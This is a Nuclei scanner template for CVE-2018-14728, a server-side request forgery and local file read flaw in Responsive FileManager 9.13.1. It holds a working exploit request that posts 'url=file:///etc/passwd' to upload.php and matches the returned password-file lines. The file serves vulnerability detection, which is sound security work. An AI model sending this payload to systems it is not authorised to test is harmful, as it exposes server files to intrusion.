nuclei-templates/cves/2018/CVE-2018-14728.yaml

30 lines
785 B
YAML

id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: critical
tags: cve,cve2018,ssrf,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-14728
cwe-id: CWE-918
description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter."
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
requests:
- method: POST
path:
- "{{BaseURL}}/filemanager/upload.php"
body: "fldr=&url=file:///etc/passwd"
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body